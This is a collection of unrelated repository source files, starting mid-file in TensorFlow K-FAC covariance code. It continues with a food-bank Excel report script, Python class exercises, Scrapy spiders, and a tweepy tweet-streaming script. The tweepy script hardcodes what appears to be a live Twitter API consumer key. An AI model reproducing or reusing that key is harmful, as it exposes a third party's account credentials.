"""Returns cov as a linear operator. Args: damping: Damping value tensor. If `damping` is not None then returns damped covariance matrix. Returns: tf.linalg.LinearOperator instance. """ if damping is not None: cov = self.cov + damping * tf.eye(self._cov_shape[0], dtype=self._dtype) else: cov = self.cov cov_operator = tf.linalg.LinearOperatorKronecker([ tf.linalg.LinearOperatorFullMatrix( cov, is_self_adjoint=True, is_square=True), tf.linalg.LinearOperatorIdentity( num_rows=self._kw_kh, dtype=self._dtype) ]) if self._has_bias: bias_value = damping if damping is not None else 0. bias_operator = tf.linalg.LinearOperatorFullMatrix([[bias_value]], is_self_adjoint=True, is_square=True) cov_operator = tf.linalg.LinearOperatorBlockDiag( [cov_operator, bias_operator]) if ASSUME_ZERO_MEAN_ACTIVATIONS: return cov_operator else: # self.mu kron 1's vec is computed below by tiling mu. hatmu = tf.tile(self.mu, [1, self._kw_kh]) if self._has_bias: tildemu = append_homog(tf.reshape(hatmu, (-1,))) mean_update = tf.expand_dims(tildemu, axis=1) else: mean_update = tf.reshape(hatmu, (-1, 1)) return tf.linalg.LinearOperatorLowRankUpdate( cov_operator, mean_update, is_self_adjoint=True, is_square=True) def get_cov_as_linear_operator(self): return self._make_cov_linear_operator() def get_cholesky(self, damping_func): raise NotImplementedError("ConvInputSUAKroneckerFactor does not support" "cholesky factorization") def get_cholesky_inverse(self, damping_func): raise NotImplementedError("ConvInputSUAKroneckerFactor does not support" "cholesky inverse computation") def register_cholesky(self): raise NotImplementedError("ConvInputSUAKroneckerFactor does not support" "cholesky factorization") def register_cholesky_inverse(self): raise NotImplementedError("ConvInputSUAKroneckerFactor does not support" "cholesky inverse computation") def _get_data_device(self, tower): return self._inputs[tower].device class ConvOutputKroneckerFactor(DenseSquareMatrixFactor): r"""Kronecker factor for the output side of a convolutional layer. Estimates E[ ds ds^T ] where s is the preactivations of a convolutional layer given example x and ds = (d / d s) log(p(y|x, w)). Expectation is taken over all examples and locations. Equivalent to Gamma in https://arxiv.org/abs/1602.01407 for details. See Section 3.1 Estimating the factors. """ def __init__(self, outputs_grads, data_format=None): """Initializes ConvOutputKroneckerFactor. Args: outputs_grads: List of list of Tensors. Each Tensor is of shape [batch_size, ..spatial_input_size.., out_channels]. First list index is source, the second is tower. data_format: None or str. Format of outputs_grads. Raises: ValueError: If channels are not final dimension. """ if not utils.is_data_format_channel_last(data_format): raise ValueError("Channel must be last.") self._out_channels = outputs_grads[0][0].shape.as_list()[-1] self._outputs_grads = outputs_grads super(ConvOutputKroneckerFactor, self).__init__() @property def _var_scope(self): return "ff_convoutkron_" + scope_string_from_params( nest.flatten(self._outputs_grads)) @property def _cov_shape(self): size = self._out_channels return [size, size] @property def _num_sources(self): return len(self._outputs_grads) @property def _num_towers(self): return len(self._outputs_grads[0]) @property def _dtype(self): return self._outputs_grads[0][0].dtype def _partial_batch_size(self, source=0, tower=0): return utils.get_shape(self._outputs_grads[source][tower])[0] def _compute_new_cov(self, source, tower): outputs_grad = self._outputs_grads[source][tower] # reshaped_tensor below is the matrix DS_l defined in the KFC paper # (tilde omitted over S for clarity). It has shape M|T| x I, where # M = minibatch size, |T| = number of spatial locations, and # I = number of output maps for convolutional layer l. reshaped_tensor = tf.reshape(outputs_grad, [-1, self._out_channels]) # Following the reasoning in ConvInputKroneckerFactor._compute_new_cov, # compute_cov here returns 1/M|T| * DS_l^T DS_l = hat{Gamma}_l # as defined in the paper, with shape I x I. # (Tilde omitted over S for clarity.) return compute_cov(reshaped_tensor) def _get_data_device(self, tower): return self._outputs_grads[0][tower].device class ConvOutputMultiKF(ConvOutputKroneckerFactor): def __init__(self, outputs_grads, num_uses, data_format=None): super(ConvOutputMultiKF, self).__init__(outputs_grads, data_format=data_format) self._num_uses = num_uses def _partial_batch_size(self, source=0, tower=0): # Note that some internal comptutations of "batch_size" done in the parent # class won't actually be the proper batch size. Instead, they will be # just "the thing to normalize the statistics by", essentially. This is okay # as we don't mix the two things up. return (super(ConvOutputMultiKF, self)._partial_batch_size(source=source, tower=tower) // self._num_uses) class FullyConnectedMultiKF(FullyConnectedKroneckerFactor): """Kronecker factor for a fully connected layer used multiple times.""" def __init__(self, tensors, num_uses=None, has_bias=False): """Constructs a new `FullyConnectedMultiKF`. Args: tensors: List of list of Tensors of shape, each of shape [num_uses * batch_size, n], and is a reshape version of a Tensor of shape [num_uses, batch_size, n]. Each of these tensors is usually a layer's inputs or its output's gradients. The first list index is sources, the second is towers. num_uses: int. The number of time-steps / uses. has_bias: bool. If True, '1' is appended to each row. """ self._num_uses = num_uses self._cov_dt1 = None self._acc_cov_dt1 = None self._make_cov_dt1 = False self._option1quants_by_damping = OrderedDict() self._option2quants_by_damping = OrderedDict() self._option1quants_registrations = set() self._option2quants_registrations = set() super(FullyConnectedMultiKF, self).__init__(tensors=tensors, has_bias=has_bias) @property def _num_timesteps(self): return self._num_uses def _partial_batch_size(self, source=0, tower=0): total_len = utils.get_shape(self._tensors[source][tower])[0] return total_len // self._num_timesteps @property def _var_scope(self): return "ff_fc_multi_" + scope_string_from_params( tuple(nest.flatten(self._tensors)) + (self._num_timesteps, self._has_bias,)) def get_inv_vars(self): inv_vars = super(FullyConnectedMultiKF, self).get_inv_vars() inv_vars.extend(self._option1quants_by_damping.values()) inv_vars.extend(self._option2quants_by_damping.values()) return inv_vars def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True): op = super(FullyConnectedMultiKF, self).make_covariance_update_op( ema_decay, ema_weight, should_write=should_write) if self._cov_dt1 is not None: new_cov_dt1_contribs = [] for source in range(self._num_sources): for tower in range(self._num_towers): with maybe_place_on_device(self._get_data_device(tower)): new_cov_dt1_contribs.append(self._compute_new_cov_dt1(source, tower)) new_cov_dt1 = (tf.add_n(new_cov_dt1_contribs) / float(self._num_towers)) # See comments in FisherFactor.make_covariance_update_op() for details. new_cov_dt1 = utils.all_average(new_cov_dt1) op2 = accumulate_and_maybe_write(self._acc_cov_dt1, self._cov_dt1, new_cov_dt1, ema_decay, ema_weight, should_write) # TODO(b/69112164): # It's important that _cov and _cov_dt1 remain consistent with each # other while the inverse ops are happening. How can we ensure this? # We will need to add explicit synchronization for this to # work with asynchronous training. op = tf.group(op, op2) return op def _compute_new_cov_dt1(self, source, tower): # pylint: disable=missing-docstring tensor = self._tensors[source][tower] if self._has_bias: # This appending is technically done twice (the other time is for # _compute_new_cov()) tensor = append_homog(tensor) total_len = utils.get_shape(tensor)[0] batch_size = total_len // self._num_timesteps tensor_present = tensor[:-batch_size, :] tensor_future = tensor[batch_size:, :] # We specify a normalizer for this computation to ensure a PSD Fisher # block estimate. This is equivalent to padding with zeros, as was done # in Section B.2 of the appendix. return compute_cov( tensor_future, tensor_right=tensor_present, normalizer=total_len) def _get_data_device(self, tower): return self._tensors[0][tower].device @property def _vec_shape(self): size = self._tensors[0][0].shape[1] + self._has_bias return [size] def get_option1quants(self, damping_func): damping_id = graph_func_to_id(damping_func) return self._option1quants_by_damping[damping_id] def get_option2quants(self, damping_func): damping_id = graph_func_to_id(damping_func) return self._option2quants_by_damping[damping_id] @property def cov_dt1(self): assert self._cov_dt1 is not None return self._cov_dt1.value def get_cov_vars(self): cov_vars = super(FullyConnectedMultiKF, self).get_cov_vars() if self._make_cov_dt1: cov_vars += [self.cov_dt1] return cov_vars def register_cov_dt1(self): self._make_cov_dt1 = True def instantiate_cov_variables(self): super(FullyConnectedMultiKF, self).instantiate_cov_variables() assert self._cov_dt1 is None if self._make_cov_dt1: with tf.variable_scope(self._var_scope): self._cov_dt1 = utils.MovingAverageVariable( name="cov_dt1", shape=self._cov_shape, dtype=self._dtype, initializer=tf.zeros_initializer(), normalize_value=ZERO_DEBIAS) self._acc_cov_dt1 = utils.AccumulatorVariable( name="acc_cov_dt1", shape=self._cov_shape, dtype=self._dtype) def register_option1quants(self, damping_func): damping_id = self._register_damping(damping_func) if damping_id not in self._option1quants_registrations: self._option1quants_registrations.add(damping_id) def register_option2quants(self, damping_func): damping_id = self._register_damping(damping_func) if damping_id not in self._option2quants_registrations: self._option2quants_registrations.add(damping_id) def instantiate_inv_variables(self): super(FullyConnectedMultiKF, self).instantiate_inv_variables() for damping_id in self._option1quants_registrations: damping_func = self._damping_funcs_by_id[damping_id] damping_string = graph_func_to_string(damping_func) # It's questionable as to whether we should initialize with stuff like # this at all. Ideally these values should never be used until they are # updated at least once. with tf.variable_scope(self._var_scope): Lmat = tf.get_variable( # pylint: disable=invalid-name "Lmat_damp{}".format(damping_string), initializer=inverse_initializer, shape=self._cov_shape, trainable=False, dtype=self._dtype, use_resource=True) psi = tf.get_variable( "psi_damp{}".format(damping_string), initializer=tf.ones_initializer(), shape=self._vec_shape, trainable=False, dtype=self._dtype, use_resource=True) assert damping_id not in self._option1quants_by_damping self._option1quants_by_damping[damping_id] = (Lmat, psi) for damping_id in self._option2quants_registrations: damping_func = self._damping_funcs_by_id[damping_id] damping_string = graph_func_to_string(damping_func) # It's questionable as to whether we should initialize with stuff like # this at all. Ideally these values should never be used until they are # updated at least once. with tf.variable_scope(self._var_scope): Pmat = tf.get_variable( # pylint: disable=invalid-name "Lmat_damp{}".format(damping_string), initializer=inverse_initializer, shape=self._cov_shape, trainable=False, dtype=self._dtype, use_resource=True) Kmat = tf.get_variable( # pylint: disable=invalid-name "Kmat_damp{}".format(damping_string), initializer=inverse_initializer, shape=self._cov_shape, trainable=False, dtype=self._dtype, use_resource=True) mu = tf.get_variable( "mu_damp{}".format(damping_string), initializer=tf.ones_initializer(), shape=self._vec_shape, trainable=False, dtype=self._dtype, use_resource=True) assert damping_id not in self._option2quants_by_damping self._option2quants_by_damping[damping_id] = (Pmat, Kmat, mu) def make_inverse_update_ops(self): """Create and return update ops corresponding to registered computations.""" # TODO(b/69918258): Add correctness tests for this method. # pylint: disable=invalid-name ops = [] if (len(self._option1quants_by_damping) + len(self._option2quants_by_damping)): # Note that C0 and C1 are stand-ins for A0 and A1, or G0 and G1, from # the pseudo-code in the original paper. Because the computations for # the A and G case are essentially the same they can both be performed by # the same class (this one). C1 = self.cov_dt1 # Get the eigendecomposition of C0 (= self.cov) eigen_e, eigen_V = self.get_eigendecomp() # TODO(b/69678661): Note, there is an implicit assumption here that C1 # and C0 (as represented here by its eigen-decomp) are consistent. This # could fail to be the case if self._cov and self._cov_dt1 are not updated # consistently, or are somehow read between or during the cov updates. # Can this possibly happen? Is there a way to prevent it? for damping_id, (Lmat_var, psi_var) in self._option1quants_by_damping.items(): damping = self._damping_funcs_by_id[damping_id]() damping = tf.cast(damping, self._dtype) invsqrtC0 = tf.matmul( eigen_V * (eigen_e + damping)**(-0.5), eigen_V, transpose_b=True) # Might need to enforce symmetry lost due to numerical issues. invsqrtC0 = (invsqrtC0 + tf.transpose(invsqrtC0)) / 2.0 # The following line imposes the symmetry assumed by "Option 1" on C1. # Strangely the code can work okay with this line commented out, # depending on how psd_eig is defined. I'm not sure why. C1 = (C1 + tf.transpose(C1)) / 2.0 # hPsi = C0^(-1/2) * C1 * C0^(-1/2) (hPsi means hat{Psi}) hPsi = tf.matmul(tf.matmul(invsqrtC0, C1), invsqrtC0) # Compute the decomposition U*diag(psi)*U^T = hPsi psi, U = utils.posdef_eig(hPsi) # L = C0^(-1/2) * U Lmat = tf.matmul(invsqrtC0, U) ops.append(utils.smart_assign(Lmat_var, Lmat)) ops.append(utils.smart_assign(psi_var, psi)) for damping_id, (Pmat_var, Kmat_var, mu_var) in self._option2quants_by_damping.items(): damping = self._damping_funcs_by_id[damping_id]() damping = tf.cast(damping, self._dtype) # compute C0^(-1/2) invsqrtC0 = tf.matmul( eigen_V * (eigen_e + damping)**(-0.5), eigen_V, transpose_b=True) # Might need to enforce symmetry lost due to numerical issues. invsqrtC0 = (invsqrtC0 + tf.transpose(invsqrtC0)) / 2.0 # Compute the product C0^(-1/2) * C1 invsqrtC0C1 = tf.matmul(invsqrtC0, C1) # hPsi = C0^(-1/2) * C1 * C0^(-1/2) (hPsi means hat{Psi}) hPsi = tf.matmul(invsqrtC0C1, invsqrtC0) # Compute the decomposition E*diag(mu)*E^T = hPsi^T * hPsi # Note that we using the notation mu instead of "m" for the eigenvalues. # Instead of computing the product hPsi^T * hPsi and then doing an # eigen-decomposition of this we just compute the SVD of hPsi and then # square the singular values to get the eigenvalues. For a justification # of this approach, see: # https://en.wikipedia.org/wiki/Singular-value_decomposition#Relation_to_eigenvalue_decomposition sqrtmu, _, E = tf.svd(hPsi) mu = tf.square(sqrtmu) # Mathematically, the eigenvalues should not should not exceed 1.0, but # due to numerical issues, or possible issues with inconsistent # values of C1 and (the eigen-decomposition of) C0 they might. So # we enforce this condition. mu = tf.minimum(mu, 1.0) # P = (C0^(-1/2) * C1)^T * C0^(-1/2) = C_1^T * C_0^(-1) Pmat = tf.matmul(invsqrtC0C1, invsqrtC0, transpose_a=True) # K = C_0^(-1/2) * E Kmat = tf.matmul(invsqrtC0, E) ops.append(utils.smart_assign(Pmat_var, Pmat)) ops.append(utils.smart_assign(Kmat_var, Kmat)) ops.append(utils.smart_assign(mu_var, mu)) ops += super(FullyConnectedMultiKF, self).make_inverse_update_ops() return [tf.group(*ops)] # pylint: enable=invalid-name ```
{ "source": "2018-Arizona-Opportunity-Hack/Team15", "score": 3 }
#### File: Team15/FBM Utility/GenerateMonthlyReport.py ```python import sys import calendar import datetime from dateutil.relativedelta import relativedelta import sys import operator import pandas as pd import numpy as np import openpyxl from FoodBankManager import FBM import FixedData def add_data(chart, data, from_rows=False, titles_from_data=False, title=None): """ Add a range of data in a single pass. The default is to treat each column as a data series. """ if not isinstance(data, openpyxl.chart.Reference): data = openpyxl.chart.Reference(range_string=data) if from_rows: values = data.rows else: values = data.cols for v in values: range_string = u"{0}!{1}:{2}".format(data.sheetname, v[0], v[-1]) series = openpyxl.chart.series_factory.SeriesFactory(range_string, title_from_data=titles_from_data, title=title) self.ser.append(series) def FindLastMonthsDates(): """ Finds the first and last days of last month :return: (first_of_month, last_of_month) :rtype: tuple(datetime.date, datetime.date) """ now = datetime.date.today() last_of_month = now.replace(day=1) - datetime.timedelta(days=1) first_of_month = last_of_month.replace(day=1) return first_of_month, last_of_month def RunMonthlyReport(FBMInst,month=None, year=None): if month is not None and year is not None: start = datetime.date(year, month, 1) end = datetime.date(year, month, calendar.monthrange(year, month)[1]) else: start, end = FindLastMonthsDates() data = FBMInst.GetFoodDonations(start, end) data[["Weight (lbs)"]] = data[["Weight (lbs)"]].astype("float") return data def PivotInventoryTable(df): df[["Weight (lbs)"]] = df[["Weight (lbs)"]].astype("float") df = pd.pivot_table(df, index=["DonorCategory"], values=["Weight (lbs)"], aggfunc=[np.sum]) return df def MonthlyGuestData(FBMInst,month=None, year=None): if month is not None and year is not None: start = datetime.date(year, month, 1) end = datetime.date(year, month, calendar.monthrange(year, month)[1]) else: start, end = FindLastMonthsDates() data = FBMInst.GetGuestData(start, end) data[["Tracking Result"]] = data[["Tracking Result"]].astype("int") return data def WriteSummaryData(q, ws, origin=(1,1), month=None, year=None, existing_clients=None, inventory_adjust=0, donor_catagories=[]): if month is not None and year is not None: start = datetime.date(year, month, 1) end = datetime.date(year, month, calendar.monthrange(year, month)[1]) else: start, end = FindLastMonthsDates() donation_data = RunMonthlyReport(q, month=start.month, year=start.year) user_data = MonthlyGuestData(q, month=start.month, year=start.year) clients = set(user_data["Guest ID"].unique()) if existing_clients is None: existing_clients = set() new_clients = set([c for c in clients if c not in existing_clients]) ws.column_dimensions[ws.cell(row=origin[0], column=origin[1]).column].width = 14 for cell_row in range(origin[0], origin[0] + len(donor_catagories) + 10 + 1): ws.cell(row=cell_row, column=origin[1]).style = "Input" ws.cell(row=origin[0], column=origin[1]).value = "{}".format(start.strftime("%B %Y")) ws.cell(row=origin[0], column=origin[1]).style = "Headline 4" ws.cell(row=origin[0], column=origin[1]).alignment = openpyxl.styles.Alignment(horizontal='center') for i, item in enumerate(donor_catagories): ws.cell(row=origin[0] + i + 1, column=origin[1]).value = donation_data[donation_data["DonorCategory"] == item].sum()["Weight (lbs)"] ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).value = "=SUM({}:{})".format(ws.cell(row=origin[0] + 1, column=origin[1]).coordinate, ws.cell(row=origin[0] + len(donor_catagories), column=origin[1]).coordinate) ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).style = "Calculation" ws.cell(row=origin[0] + len(donor_catagories) + 2, column=origin[1]).value = donation_data[donation_data["DonorCategory"] == "Waste"].sum()["Weight (lbs)"] ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).value = "={}-{}".format(ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).coordinate, ws.cell(row=origin[0] + len(donor_catagories) + 2, column=origin[1]).coordinate) ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).style = "Calculation" ws.cell(row=origin[0] + len(donor_catagories) + 4, column=origin[1]).style = "Normal" if (month, year) in FixedData.override.keys(): ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).value = FixedData.override[(month, year)]["clients"] ws.cell(row=origin[0] + len(donor_catagories) + 6, column=origin[1]).value = FixedData.override[(month, year)]["new_clients"] ws.cell(row=origin[0] + len(donor_catagories) + 7, column=origin[1]).value = FixedData.override[(month, year)]["impact"] else: ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).value = len(clients) ws.cell(row=origin[0] + len(donor_catagories) + 6, column=origin[1]).value = len(new_clients) ws.cell(row=origin[0] + len(donor_catagories) + 7, column=origin[1]).value = user_data["Tracking Result"].sum() ws.cell(row=origin[0] + len(donor_catagories) + 8, column=origin[1]).value = "={}*{}".format(ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).coordinate, FixedData.output_weight) ws.cell(row=origin[0] + len(donor_catagories) + 9, column=origin[1]).style = "Normal" ws.cell(row=origin[0] + len(donor_catagories) + 10, column=origin[1]).value = "=IF(ISTEXT({0:}), {2:}-{1:}, {2:}-{1:}+{0:})+({3:})".format(ws.cell(row=origin[0] + len(donor_catagories) + 10, column=origin[1]-1).coordinate, ws.cell(row=origin[0] + len(donor_catagories) + 8, column=origin[1]).coordinate, ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).coordinate, inventory_adjust) return existing_clients.union(new_clients) def WriteSummaryLabel(ws, origin=(1,1), donor_catagories=[]): ws.column_dimensions[ws.cell(row=origin[0], column=origin[1]).column].width = 22 for i, item in enumerate(donor_catagories): ws.cell(row=origin[0] + i + 1, column=origin[1]).value = "{} (lbs)".format(item) ws.cell(row=origin[0] + len(donor_catagories) + 1, column=origin[1]).value = "Total Food Income (lbs)" ws.cell(row=origin[0] + len(donor_catagories) + 2, column=origin[1]).value = "Waste (lbs)" ws.cell(row=origin[0] + len(donor_catagories) + 3, column=origin[1]).value = "Total Collected (lbs)" ws.cell(row=origin[0] + len(donor_catagories) + 5, column=origin[1]).value = "Number of Clients" ws.cell(row=origin[0] + len(donor_catagories) + 6, column=origin[1]).value = "New Clients" ws.cell(row=origin[0] + len(donor_catagories) + 7, column=origin[1]).value = "Total Impact" ws.cell(row=origin[0] + len(donor_catagories) + 8, column=origin[1]).value = "Food Distributed (lbs)" ws.cell(row=origin[0] + len(donor_catagories) + 10, column=origin[1]).value = "Ending Inventory (lbs)" for cell_row in range(origin[0], origin[0] + len(donor_catagories) + 10 + 1): ws.cell(row=cell_row, column=origin[1]).style = "Headline 4" def WriteExcelSheet(name, month=None, year=None): if month is not None and year is not None: start = datetime.date(year, month, 1) end = datetime.date(year, month, calendar.monthrange(year, month)[1]) else: start, end = FindLastMonthsDates() q = FBM("mcfb.soxbox.co") wb = openpyxl.Workbook() ws = wb.active ws.title = "12 Month Overview" # borrowed code from GenerateGraphs.py figures inventory adjustment and proper categories if month is not None and year is not None: x_end = datetime.datetime(year, month, 1) else: x_now = datetime.datetime.now() x_end = datetime.datetime(x_now.year, x_now.month, 1) x_end = x_end + relativedelta(months=+1) x_start = x_end + relativedelta(months=-13) food_data = q.GetFoodDonations(x_start, x_end) guest_data = q.GetGuestData(x_start, x_end) food_data[u'Donated On'] = pd.to_datetime(food_data[u'Donated On']).astype(datetime.datetime) food_data[u'Weight (lbs)'] = food_data[u'Weight (lbs)'].astype(float) guest_data[u'Outreach on'] = pd.to_datetime(guest_data[u'Outreach on']).astype(datetime.datetime) guest_data[u'Tracking Result'] = guest_data[u'Tracking Result'].astype(int) period_start = x_start inventory = 0 inventory_adjust = 0 categories = set(["Grocery", "Org/Corp"]) for i in range(13): period_end = period_start + relativedelta(months=+1) food_month = food_data[(food_data[u'Donated On'] >= period_start) & (food_data[u'Donated On'] < period_end)] guest_month = guest_data[(guest_data[u'Outreach on'] >= period_start) & (guest_data[u'Outreach on'] < period_end)] month_clients = len(set(guest_month[u'Guest ID'].unique())) if (period_start.month, period_start.year) in FixedData.override.keys(): month_clients = FixedData.override[(period_start.month, period_start.year)]['clients'] intake_total = food_month[food_month[u'DonorCategory'] != u'Waste'][u'Weight (lbs)'].sum() waste_total = food_month[food_month[u'DonorCategory'] == u'Waste'][u'Weight (lbs)'].sum() output_total = month_clients * FixedData.output_weight food_out_total = waste_total + output_total if i > 0 and (period_start.month, period_start.year) in FixedData.inventory.keys(): inventory_adjust = (FixedData.inventory[(period_start.month, period_start.year)] - (intake_total - food_out_total)) - inventory #print("FixedData.inventory[({}, {})] = {}; intake_total = {}; waste_total = {}; output_total = {}; food_out_total = {}; month net food is {}; tallied inventory is {} => inventory_adjust = {}".format(period_start.month, period_start.year, FixedData.inventory[(period_start.month, period_start.year)], intake_total, waste_total, output_total, food_out_total, intake_total - food_out_total, inventory, inventory_adjust)) if i > 0: inventory += (intake_total - (waste_total + output_total)) #print("intake={}, waste={}, output={}, delta={}, inventory={}".format(intake_total, waste_total, output_total, (intake_total - (waste_total + output_total)), inventory)) food_datums = RunMonthlyReport(q, month=period_start.month, year=period_start.year) if not food_datums.empty: messy_data = PivotInventoryTable(food_datums) useful_data = messy_data.to_dict()[('sum', 'Weight (lbs)')] sorted_data = zip(*sorted(useful_data.items(), key=operator.itemgetter(1), reverse=True)) categories = categories.union(sorted_data[0]) period_start = period_end if u'Waste' in categories: categories.remove(u'Waste') WriteSummaryLabel(ws, origin=(2, 1), donor_catagories=categories) ym_start = 12 * year + month - 1 clients = set() adjusted = False for i, ym in enumerate(range(ym_start - 11, ym_start + 1)): y, m = divmod(ym, 12) if not adjusted: clients = WriteSummaryData(q, ws, origin=(2, i+2), month=m+1, year=y, existing_clients=clients, inventory_adjust=inventory_adjust, donor_catagories=categories) adjusted = True else: clients = WriteSummaryData(q, ws, origin=(2, i+2), month=m+1, year=y, existing_clients=clients, donor_catagories=categories) ws.merge_cells('B1:M1') for col in ['B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M']: ws['{}1'.format(col)].style = "Headline 1" ws['B1'] = "12 Month Overview" ws['B1'].alignment = openpyxl.styles.Alignment(horizontal='center') ws['N1'] = "Last Year's Performance" ws['N1'].style = "Headline 1" WriteSummaryData(q, ws, origin=(2, 14), month=month, year=year-1, donor_catagories=categories) ws.column_dimensions['N'].width = 30 ws['N{}'.format(8+len(categories))].style = "Normal" ws['N{}'.format(8+len(categories))] = "" ws['N{}'.format(12+len(categories))].style = "Normal" ws['N{}'.format(12+len(categories))] = "" ws.freeze_panes = "B3" c1 = openpyxl.chart.LineChart() c1.title = "Food Income (Lbs), Large sources" data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A3:M4")) c1.add_data(data, titles_from_data=True, from_rows=True) ws.add_chart(c1, "B22") c1 = openpyxl.chart.LineChart() c1.title = "Food Income (Lbs), All Other Sources" data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A5:M{}".format(2+len(categories)))) c1.add_data(data, titles_from_data=True, from_rows=True) ws.add_chart(c1, "H22") c1 = openpyxl.chart.LineChart() c1.title = "Ending Inventory (lbs)" data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A{0}:M{0}".format(12+len(categories)))) c1.add_data(data, titles_from_data=True, from_rows=True) ws.add_chart(c1, "N22") c1 = openpyxl.chart.LineChart() c1.title = "Waste (lbs)" data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A{0}:M{0}".format(4+len(categories)))) c1.add_data(data, titles_from_data=True, from_rows=True) ws.add_chart(c1, "B37") c1 = openpyxl.chart.LineChart() c1.title = "Clients" data = openpyxl.chart.Reference(*(ws,) + openpyxl.utils.cell.range_boundaries("A{0}:M{1}".format(7+len(categories), 9+len(categories)))) c1.add_data(data, titles_from_data=True, from_rows=True) ws.add_chart(c1, "H37") filename = "{}.xlsx".format(name) wb.save(filename) return filename if __name__ == '__main__': pd.set_option('display.expand_frame_repr', False) if len(sys.argv) < 3: print "Run with \"<month number (1-12)> <Year (4 digit)>\"" print WriteExcelSheet("out/Report {}-{}".format(sys.argv[1], sys.argv[2]), month=int(sys.argv[1]), year=int(sys.argv[2])) ```
{ "source": "2018-B-GR1-Python/Velasco-Yepez-Andres-David", "score": 4 }
#### File: Velasco-Yepez-Andres-David/01-Python/09_classes.py ```python class Escuela: # valor_categoria = 4 __ciudad = 'Quito' # atributo privado pais = 'Ecuador' # atributo publico def __init__(self, nombre, valor_categoria=4): print(self) print('Hola constructor') self.nombre = nombre self.valor_categoria = valor_categoria def saludar(self): print(f'Hola desde {self.nombre} localizada en' f' {self.__ciudad} - {self.pais}') def categoria(self): return self.__calcular_categoria() def __calcular_categoria(self): # metodo privado return self.valor_categoria * 3 def __str__(self): return 'Escuela' twa = Escuela('Theodoro Winword Anderson') twa.valor_categoria = 2 twa.saludar() print(twa.categoria()) class Auto: _ensamblado = 'Quito' numero_asientos = 5 def __init__(self, nombre, color): self.nombre = nombre self.color = color def __init__(self, nombre, color, color_techo=''): self.nombre = nombre self.color = color self.color_techo = color_techo def cambiar_ensamblado(self, ensamblado): self._ensamblado = ensamblado def __maximo_numero_pasajeros(self): return self.numero_asientos + 3 def __str__(self): return (f"{self.nombre}\n" f"{self.color}\n" f"{self.color_techo}\n" f"{self.numero_asientos}\n" f"{self._ensamblado}\n" f"{self.__maximo_numero_pasajeros()}\n") bmw = Auto('Blanco', 'Version 1') print(bmw) class Hyundai(Auto): def __init__(self, color, nombre): super().__init__(color=color, nombre=nombre) print('constructor') print(self._ensamblado) mi_carro = Hyundai('Negro', 'Santa fe') print(mi_carro) ``` #### File: python_01/spiders/intro_spider_01.py ```python import scrapy nombre_archivo = 'libros.csv' def guardar_archivo(titulos, precios, stocks): lista_stock = [] for stock in stocks: if 'In stock' in stock: lista_stock.append('1') else: lista_stock.append('0') import csv with open(nombre_archivo, 'w', newline='') as csvfile: spamwriter = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL) data = list(zip(titulos, precios, lista_stock)) for row in data: row = list(row) spamwriter.writerow(row) print("Listo :)") class MiPrimerSpider(scrapy.Spider): name = 'intro_spider' def start_requests(self): urls = [ 'http://books.toscrape.com/catalogue/page-1.html', 'http://books.toscrape.com/catalogue/page-2.html', 'http://books.toscrape.com/catalogue/page-3.html', ] for url in urls: yield scrapy.Request(url=url, callback=self.parse) def parse(self, response): titulos = response.css('article > h3 > a::text').extract() precios = response.css('article > div > p:nth-child(1)::text').extract() stocks = response.xpath( "/html/body/div/div/div/div/section/div/ol/li/article/div/p[@class='instock availability']/text()")\ .extract() guardar_archivo(titulos,precios,stocks) ``` #### File: python_04/python_04/items.py ```python import scrapy from scrapy.loader.processors import MapCompose def shorten_amazon_link(link): id_producto = link.split('/')[-1] # ultimo elemento short_link = 'https://www.amazon.com/dp/' + id_producto return short_link class ProductoItem(scrapy.Item): titulo = scrapy.Field() precio = scrapy.Field() link = scrapy.Field( input_processor=MapCompose(shorten_amazon_link) ) ``` #### File: python_04/spiders/input_processor.py ```python import scrapy from scrapy.loader import ItemLoader from scrapy.loader.processors import MapCompose from scrapy.loader.processors import TakeFirst from python_04.items import ProductoItem def truncar_texto(texto): return texto[:50] class DetallesProducto(scrapy.Spider): name = 'novicompu' start_urls = [ 'https://www.novicompu.com/12-laptops' ] def parse(self, response): resultados_busqueda = response.css('div.product-container > div') for producto in resultados_busqueda: producto_loader = ItemLoader( item=ProductoItem(), selector=producto ) producto_loader.default_input_processor = MapCompose(truncar_texto) producto_loader.default_output_processor = TakeFirst() titulo = producto_loader.add_css('titulo', 'h5 > a.product-name::text') precio = producto_loader.add_css('precio', 'span.price.product-price::text') link = producto_loader.add_css('link', 'h5 > a.product-name::attr(href)') print(titulo, precio, link) yield producto_loader.load_item() # Es un return q no para el loop ``` #### File: Velasco-Yepez-Andres-David/Proyecto2BIM/get_tweets.py ```python from tweepy import Stream from tweepy import OAuthHandler from tweepy.streaming import StreamListener # API CREDENTIALS ckey = "XTwJNYD8b9bekoIvJ4q5j1JUf" csecret = "<KEY>" atoken = "<KEY>" asecret = "<KEY>" class listener(StreamListener): def on_data(self, data): with open('tweets_mexico.json', 'a') as diccionario: diccionario.write(data+",") return True def on_error(self, status): print (status) auth = OAuthHandler(ckey, csecret) auth.set_access_token(atoken, asecret) twitterStream = Stream(auth, listener()) filters = [ 'donaldtrump', 'trump', 'goverment', 'whitehouse', 'Trump' ] # EEUU = -120.3,29.7,-87.8,46.3 # RUS = 37.28,52.72,91.07,66.19 # JAPON 131.46,30.57,146.57,44.94 # MEXICO -113.13,11.19,-88.91,31.74 twitterStream.filter(locations=[-113.13,11.19,-88.91,31.74], track=filters) ``` #### File: Velasco-Yepez-Andres-David/proyecto/crud.py ```python import pandas as pd url = 